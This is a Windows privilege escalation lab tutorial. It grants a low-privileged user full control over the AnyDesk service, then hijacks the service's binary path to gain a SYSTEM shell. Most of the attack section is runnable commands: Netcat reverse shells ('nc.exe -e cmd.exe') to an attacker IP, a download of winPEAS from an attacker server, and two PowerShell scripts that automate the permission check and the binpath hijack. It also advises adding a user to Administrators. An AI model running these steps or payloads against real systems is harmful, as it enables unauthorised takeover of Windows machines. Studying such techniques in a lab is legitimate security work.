Windows Privilege Escalation — Service binary path write-based privesc with Service Full Access
Before exploiting the service, we will build the vulnerable machine ourselves and then perform the exploit against it.
Let’s Start
Install any remote desktop application; here we install “AnyDesk”. Run the application once, then close it.
To list the running processes together with the services they host, and then query a service’s configuration:
$tasklist /svc
$sc qc <service-name>
“AnyDesk” is running as LocalSystem.
SERVICE_START_NAME shows the account under which the service runs.
LocalSystem (NT AUTHORITY\SYSTEM) is the most privileged account on a Windows system: it has more rights than the built-in Administrator account or any user who is a member of the Administrators group, which is what makes a service running as LocalSystem such an attractive target.
Let’s look for a normal (non-admin) user account.
$net user
Then check whether the “test” user is a member of any administrative group (see the “Local Group Memberships” line in the output).
$net user test
Now install “Process Explorer” (Sysinternals). We will use it to modify the permissions of the service.
Using Process Explorer we can change the access control rights on a service object.
Search “Anydesk” in Process Explorer.
Right click on AnyDesk.exe → Permissions → Add → Advanced → Find Now → add the test user
Give the user Full Control.
Full Control on the service object means the test user gets every service right, including the ones that matter for this attack: change the service configuration, start and stop the service, and change its permissions.
Let’s restart the service.
The new permission on the service object takes effect immediately; restarting simply confirms the service still starts cleanly after the change.
Now the setup is complete.
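As an added example that is not part of the original post, the same permission change can be made without the Process Explorer GUI from an elevated PowerShell prompt, using sc.exe sdshow / sdset to append a full-access ACE to the service’s DACL. It assumes the service name AnyDesk and the user name test from the lab above.

```powershell
# Added example (not from the original post): grant the "test" user full
# control over the AnyDesk service with sc.exe sdset, an alternative to the
# Process Explorer GUI. Run from an elevated PowerShell prompt. The service
# name and user name are assumed to match the lab.
$svc  = 'AnyDesk'
$user = 'test'

# SDDL ACEs carry SIDs, not names, so resolve the account first.
$sid = (New-Object System.Security.Principal.NTAccount($user)).Translate([System.Security.Principal.SecurityIdentifier]).Value

# Current security descriptor, e.g.
# D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)...S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
$sddl = (sc.exe sdshow $svc | Where-Object { $_ -match '^D:' }).Trim()

# CCDCLCSWRPWPDTLOCRSDRCWDWO is SERVICE_ALL_ACCESS: it includes WP (change
# config), RP (start), DT (stop), WD (change DACL) and WO (take ownership).
$ace = "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$sid)"

if ($sddl -like "*$sid*") {
    Write-Host "$user already has an ACE on $svc"
} else {
    # Append the ACE to the DACL; keep the SACL ("S:" part) intact if present.
    $newSddl = $sddl + $ace
    if ($sddl -match '^(D:.*?)(S:.*)$') { $newSddl = $Matches[1] + $ace + $Matches[2] }
    sc.exe sdset $svc $newSddl
}

# Show the result and restart the service to confirm it still starts cleanly.
sc.exe sdshow $svc
Restart-Service -Name $svc -Force
```

The second sc.exe sdshow should now list an ACE for the test user’s SID with the full-access rights string; that line is exactly what winPEAS and accesschk evaluate later when they flag the service as modifiable.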
Initial Access
Log in as the “test” user.
We are now logged in as the test user.
Locate the Netcat executable (nc.exe) on the machine; if it is not present, download it from GitHub.
Let’s send a shell back with Netcat, with a listener already waiting on the attacker machine.
Assume that we exploited some service and this is the initial shell we obtained.
$nc.exe -e cmd.exe <ip_address> <port_number>
Let’s perform the Windows privilege escalation attack
(Service binary path write-based privesc with Service Full Access)
Now the question is: once you have an initial shell on a Windows system, what do you do next?
The usual first step is to run winPEAS.
Start a Python HTTP server on the attacker machine and download winPEAS onto the Windows system.
$powershell -c wget http://192.168.29.219:8001/winPEASx64.exe -OutFile win.exe
Now run the winPEAS binary we just downloaded.
Here we are interested in the “Modifiable Services” section.
winPEAS shows that we have full access on the AnyDesk service from an access control point of view.
The service runs as “LocalSystem”, the highest privilege.
Our next step is to change the service’s binary path to point at our malicious executable, and then restart the service.
When the service starts, the Service Control Manager launches whatever binary path is configured, as LocalSystem. Instead of AnyDesk it now launches our payload, which gives us a SYSTEM-level shell.
sc config is the service configuration command.
binpath= "" sets a new binary path (note that sc.exe requires a space after binpath=).
We give it the path to Netcat together with its command line options (-e cmd.exe, attacker IP and port), all inside the quotes.
Binary Path has been changed successfully.
Now stop the service.
Start the Netcat listener on the attacker machine, then start the service.
We got a SYSTEM shell by changing the binary path. Expect sc start to report error 1053 (the service did not respond in time): nc.exe never registers with the Service Control Manager, but by then it has already been launched as LocalSystem.
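As an added example that is not part of the original post, the following PowerShell script ties together the “Modifiable Services” check behind the winPEAS finding and the binary path hijack itself. It assumes the service name AnyDesk, nc.exe at C:\Users\test\nc.exe and a listener at 192.168.29.219:4444 (all lab values, not from the original), and is run from the low-privileged Netcat shell after typing powershell in it.

```powershell
# Added example (not the original post's commands). Run from the Netcat cmd
# shell after typing "powershell". Assumed lab values: service "AnyDesk",
# nc.exe at C:\Users\test\nc.exe, attacker listener at 192.168.29.219:4444.
$svc     = 'AnyDesk'
$payload = 'C:\Users\test\nc.exe -e cmd.exe 192.168.29.219 4444'

# SDDL uses two-letter aliases for well-known SIDs; map the ones that usually
# appear on service DACLs to the raw SIDs that "whoami" prints.
$sidAlias = @{ 'WD'='S-1-1-0'; 'AU'='S-1-5-11'; 'IU'='S-1-5-4'; 'SU'='S-1-5-6';
               'SY'='S-1-5-18'; 'BA'='S-1-5-32-544'; 'BU'='S-1-5-32-545' }

# Returns $true if the current token holds SERVICE_CHANGE_CONFIG ("WP") or
# GENERIC_ALL ("GA") on the service through its own SID or any group SID.
# This is the condition winPEAS reports under "Modifiable Services".
# Deny ACEs are ignored here for brevity.
function Test-ServiceChangeConfig([string]$Name) {
    $mySids = @((whoami /user   /fo csv | ConvertFrom-Csv).SID) +
              @((whoami /groups /fo csv | ConvertFrom-Csv).SID)
    $sddl = (sc.exe sdshow $Name | Where-Object { $_ -match '^D:' }).Trim()
    # Each allow ACE looks like (A;flags;rights;;;sid); rights are 2-letter tokens.
    foreach ($m in [regex]::Matches($sddl, '\(A;[^;]*;([^;]*);;;([^)]*)\)')) {
        $rights = [regex]::Matches($m.Groups[1].Value, '..') | ForEach-Object { $_.Value }
        $sid    = $m.Groups[2].Value
        if ($sidAlias.ContainsKey($sid)) { $sid = $sidAlias[$sid] }
        if (($mySids -contains $sid) -and ($rights -contains 'WP' -or $rights -contains 'GA')) {
            return $true
        }
    }
    return $false
}

if (-not (Test-ServiceChangeConfig $svc)) {
    Write-Warning "No SERVICE_CHANGE_CONFIG on $svc; this technique will not work"
    return
}

# Record the original path so the service can be put back once we have SYSTEM.
$origPath = (sc.exe qc $svc | Select-String 'BINARY_PATH_NAME').Line.Split(':', 2)[1].Trim()
Write-Host "Original binary path (restore with sc config afterwards): $origPath"

# Hijack the path. sc.exe syntax needs the space after "binpath=".
sc.exe config $svc binpath= $payload
sc.exe stop  $svc   # error 1062 only means the service was not running
sc.exe start $svc   # error 1053 is expected: nc.exe never registers with the
                    # SCM, but by then it is already running as LocalSystem
```

Two caveats a practitioner will run into: the SCM may terminate the non-service process once its start timeout expires, so from the SYSTEM shell spawn a second process (another nc.exe, or a user you add to Administrators) before the first one dies; and the original binary path printed by the script should be restored by hand with sc config once you are done, since the path contains embedded quotes that are awkward to pass back through PowerShell’s native command argument handling.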